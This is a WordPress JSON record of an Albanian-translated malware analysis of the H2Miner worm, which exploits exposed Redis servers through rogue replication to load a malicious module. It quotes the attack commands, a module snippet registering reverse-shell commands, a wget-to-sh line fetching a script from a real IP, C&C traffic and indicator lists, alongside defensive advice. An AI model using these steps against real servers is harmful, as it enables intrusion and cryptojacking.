{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"U zbulua nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Nj\u00eb dit\u00eb m\u00eb par\u00eb, nj\u00eb nga server\u00ebt e projektit tim u sulmua nga nj\u00eb worm t\u00eb ngjash\u00ebm. N\u00eb k\u00ebrkim t\u00eb p\u00ebrgjigjes p\u00ebr pyetjen \"\u00e7far\u00eb ishte kjo?\" gjeta nj\u00eb artikull t\u00eb shk\u00eblqyer nga ekipi i Siguris\u00eb s\u00eb Alibaba Cloud. Duke qen\u00eb se nuk e gjeta k\u00ebt\u00eb artikull n\u00eb habr, vendosa ta p\u00ebrkthej ve\u00e7mas p\u00ebr ju &lt;3\n<\/p><\/blockquote>\n<h2>Hyrje<\/h2>\n<p>\nS\u00eb fundmi, ekipi i siguris\u00eb s\u00eb Alibaba Cloud zbuloi nj\u00eb shp\u00ebrthim t\u00eb papritur t\u00eb H2Miner. Ky lloj worm-i keqdash\u00ebs p\u00ebrdor munges\u00ebn e autorizimit ose fjal\u00ebkalimet e dob\u00ebta p\u00ebr Redis si porte p\u00ebr n\u00eb sistemet tuaja, pasuar nga sinkronizimi i modulit t\u00eb tij t\u00eb keqdash\u00ebs ndaj slave p\u00ebrmes sinkronizimit master-slave dhe, m\u00eb n\u00eb fund, ngarkon k\u00ebt\u00eb modul t\u00eb keqdash\u00ebm n\u00eb makin\u00ebn e sulmuar dhe ekzekuton instrukcionet e d\u00ebmsh\u00ebm.<\/p>\n<p>N\u00eb t\u00eb kaluar\u00ebn, sulmet ndaj sistemeve tuaja kryesisht realizoheshin p\u00ebrmes nj\u00eb metode q\u00eb p\u00ebrfshinte detyrat e planifikuara ose \u00e7el\u00ebsat SSH, t\u00eb cilat regjistroheshin n\u00eb makin\u00ebn tuaj pas hyrjes s\u00eb sulmuesit n\u00eb Redis. Fatmir\u00ebsisht, kjo metod\u00eb nuk p\u00ebrdoret shpesh p\u00ebr shkak t\u00eb problemeve me kontrollin e lejeve ose p\u00ebr shkak t\u00eb versioneve t\u00eb ndryshme t\u00eb sistemit. Megjithat\u00eb, kjo metod\u00eb e ngarkimit t\u00eb modulit t\u00eb keqdash\u00ebm mund t\u00eb ekzekutoj\u00eb direkt komandat e sulmuesit ose t\u00eb fitoj\u00eb akses n\u00eb shell, gj\u00eb q\u00eb \u00ebsht\u00eb e rrezikshme p\u00ebr sistemin tuaj.<\/p>\n<p>P\u00ebr shkak t\u00eb numrit t\u00eb madh t\u00eb <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/sq\/server\/\"   title=\"servera\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">servera<\/a> Redis, q\u00eb jan\u00eb t\u00eb vendosura n\u00eb internet (gati 1 milion), ekipi i siguris\u00eb s\u00eb Alibaba Cloud, si nj\u00eb kujtes\u00eb miq\u00ebsore, rekomandon p\u00ebrdoruesit t\u00eb mos ofrojn\u00eb akses n\u00eb Redis nga rrjeti dhe t\u00eb kontrollojn\u00eb rregullisht besueshm\u00ebrin\u00eb e fjal\u00ebkalimeve t\u00eb tyre, si dhe n\u00ebse ato jan\u00eb t\u00eb ekspozuara ndaj thyerjeve t\u00eb shpejta.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner \u00ebsht\u00eb nj\u00eb botnet p\u00ebr minimin e t\u00eb dh\u00ebnave p\u00ebr sistemet bazuar n\u00eb Linux, i cili mund t\u00eb sulmoj\u00eb sistemin tuaj n\u00eb m\u00ebnyra t\u00eb ndryshme, duke p\u00ebrfshir\u00eb munges\u00eb autorizimi n\u00eb Hadoop yarn, Docker dhe vulnerabilitetin e ekzekutimit t\u00eb komandeve t\u00eb larg\u00ebta t\u00eb Redis (RCE). Botnet-i funksionon duke ngarkuar skriptet dhe programet keqdash\u00ebse p\u00ebr t\u00eb minuar t\u00eb dh\u00ebnat tuaja, duke zgjeruar horizontalisht sulmin dhe ruajtur komunikimin me komand\u00eb dhe kontroll (C&amp;C).<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nDiturit\u00eb mbi k\u00ebt\u00eb \u00e7\u00ebshtje i ndau Pavel Toporkov n\u00eb ZeroNights 2018. Pas versionit 4.0, Redis mb\u00ebshtet funksionin e ngarkimit t\u00eb moduleve t\u00eb jashtme, q\u00eb u jep p\u00ebrdoruesve mund\u00ebsin\u00eb t\u00eb ngarkojn\u00eb skedar\u00eb so, t\u00eb kompiluar me C n\u00eb Redis p\u00ebr t\u00eb ekzekutuar komanda t\u00eb caktuara Redis. Ky funksion, megjith\u00ebse i dobish\u00ebm, p\u00ebrmban nj\u00eb vulnerabilitet, ku n\u00eb modalitetin master-slave skedar\u00ebt mund t\u00eb sinkronizohen me slave p\u00ebrmes modalitetit fullresync. Kjo mund t\u00eb p\u00ebrdoret nga sulmuesit p\u00ebr t\u00eb d\u00ebrguar skedar\u00eb t\u00eb keqdash\u00ebm so. Pas p\u00ebrfundimit t\u00eb transferimit, sulmuesit ngarkojn\u00eb modul n\u00eb instanc\u00ebn e sulmuar t\u00eb Redis dhe ekzekutojn\u00eb \u00e7do komand\u00eb.<\/p>\n<h2>Analiza e worm-it t\u00eb keqdash\u00ebm<\/h2>\n<p>\nS\u00eb fundmi, ekipi i siguris\u00eb s\u00eb Alibaba Cloud zbuloi se numri i grupit t\u00eb minator\u00ebve t\u00eb keqdash\u00ebm H2Miner papritmas u rrit shum\u00eb. Sipas analiz\u00ebs, procesi i p\u00ebrgjithsh\u00ebm i shp\u00ebrthimit t\u00eb sulmit duket k\u00ebshtu:<\/p>\n<p><img decoding=\"async\" alt=\"U zbulua nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner p\u00ebrdor RCE Redis p\u00ebr nj\u00eb sulm t\u00eb plot\u00eb. Fillimisht, sulmuesit sulmojn\u00eb server\u00ebt Redis t\u00eb pambrojtur ose server\u00ebt me fjal\u00ebkalime t\u00eb dob\u00ebta.<\/p>\n<p>M\u00eb pas ata p\u00ebrdorin komand\u00ebn <code>config set dbfilename red2.so<\/code> p\u00ebr t\u00eb ndryshuar emrin e skedarit. Pas k\u00ebsaj, sulmuesit ekzekutojn\u00eb komand\u00ebn <code>slaveof<\/code> p\u00ebr t\u00eb vendosur adres\u00ebn e hostit t\u00eb replikimit master-slave. <\/p>\n<p>Kur instanca e sulmuar e Redis vendos lidhjen master-slave me Redis-in e keqdash\u00ebm q\u00eb i p\u00ebrket sulmuesit, sulmuesi d\u00ebrgon modul t\u00eb infektuar me komand\u00ebn fullresync p\u00ebr sinkronizimin e skedar\u00ebve. M\u00eb pas, skedari red2.so do t\u00eb ngarkohet n\u00eb makin\u00ebn e sulmuar. Pas k\u00ebsaj, sulmuesit p\u00ebrdorin modul ngarkimi .\/red2.so p\u00ebr t\u00eb ngarkuar k\u00ebt\u00eb skedar so. Moduli mund t\u00eb ekzekutoj\u00eb komandat e sulmuesit ose t\u00eb nismoj\u00eb nj\u00eb lidhje t\u00eb kthyer (backdoor) p\u00ebr t\u00eb fituar akses n\u00eb makin\u00ebn e sulmuar.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nPas ekzekutimit t\u00eb komand\u00ebs keqdash\u00ebse, si <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, sulmuesi do t\u00eb vendos\u00eb emrin e skedarit t\u00eb kopjes dhe do t\u00eb shkarkoj\u00eb modul sistemin p\u00ebr t\u00eb pastruar gjurm\u00ebt. Megjithat\u00eb, skedari red2.so do t\u00eb mbetet akoma n\u00eb makin\u00ebn e sulmuar. P\u00ebrdoruesve u rekomandohet t\u00eb ken\u00eb kujdes p\u00ebr pranin\u00eb e nj\u00eb skedari t\u00eb dyshimt\u00eb n\u00eb dosjen e instanc\u00ebs s\u00eb tyre Redis.<\/p>\n<p>P\u00ebrve\u00e7 shkat\u00ebrrimit t\u00eb disa proceseve keqdash\u00ebse p\u00ebr t\u00eb vjedhur burime, sulmuesi ndoqi skenarin keqdash\u00ebs, duke ngarkuar dhe ekzekutuar skedar\u00eb keqdash\u00ebs n\u00eb form\u00eb binar\u00ebsh, p\u00ebr t\u00eb <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Kjo do t\u00eb thot\u00eb se emri i procesit ose emri i folderit q\u00eb p\u00ebrmban kinsing n\u00eb host mund t\u00eb tregoj\u00eb se kjo makin\u00eb \u00ebsht\u00eb infektuar nga ky virus.<\/p>\n<p>Sipas rezultateve t\u00eb inxhinieris\u00eb s\u00eb invers\u00eb, programi i d\u00ebmsh\u00ebm kryesisht kryen funksionet e m\u00ebposhtme:<\/p>\n<ul>\n<li>Shkarkimi dhe ekzekutimi i skedar\u00ebve<\/li>\n<li>Minator\u00ebt<\/li>\n<li>Mbajtja e lidhjes C&amp;C dhe ekzekutimi i urdhrave t\u00eb sulmuesit<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"U zbulua nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nP\u00ebrdorni masscan p\u00ebr skanimin e jasht\u00ebm p\u00ebr t\u00eb zgjeruar ndikimin. P\u00ebr m\u00eb tep\u00ebr, adresa IP e serverit C&amp;C \u00ebsht\u00eb e koduar fort brenda programit, dhe hosti i sulmuar do t\u00eb interaktoj\u00eb me serverin e komunikimit C&amp;C n\u00ebp\u00ebrmjet k\u00ebrkesave HTTP, ku informacioni i zombis\u00eb (serveri i kompromituar) identifikohet n\u00eb titullin HTTP.<\/p>\n<p><img decoding=\"async\" alt=\"U zbulua nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, si Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Metodat e tjera t\u00eb sulmit<\/h2>\n<p>\n<img decoding=\"async\" alt=\"U zbulua nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adresat dhe lidhjet q\u00eb p\u00ebrdor ky\u00e7eri<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\ns&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>K\u00ebshill\u00eb<\/h2>\n<p>\nS\u00eb pari, Redis nuk duhet t\u00eb jet\u00eb i hapur p\u00ebr qasje nga Interneti dhe duhet t\u00eb mbrohet me nj\u00eb fjal\u00ebkalim t\u00eb fort\u00eb. Gjithashtu, \u00ebsht\u00eb e r\u00ebnd\u00ebsishme q\u00eb klient\u00ebt t\u00eb kontrollojn\u00eb munges\u00ebn e skedarit red2.so n\u00eb direktorin\u00eb e Redis dhe munges\u00ebn e \"kinsing\" n\u00eb emrin e skedarit\/procesit n\u00eb host.<br \/>\n<br \/>Burimi: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.0.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.0.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"sq_AL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Shp\u00ebrthimi i ri i H2Miner t\u00eb kjo\u00e7er\u00ebve q\u00eb shfryt\u00ebzojn\u00eb Redis RCE | ProHoster","description":"Nj\u00eb dit\u00eb m\u00eb par\u00eb, nj\u00eb nga server\u00ebt e projektit tim ishte sulmuar nga nj\u00eb worm t\u00eb till\u00eb. N\u00eb k\u00ebrkim t\u00eb p\u00ebrgjigjes p\u00ebr pyetjen \"\u00e7far\u00eb ishte kjo?\" gjet\u00ebm nj\u00eb artikull t\u00eb shk\u00eblqyer nga ekipi i Alibaba Cloud Security.","canonical_url":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"sq_AL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}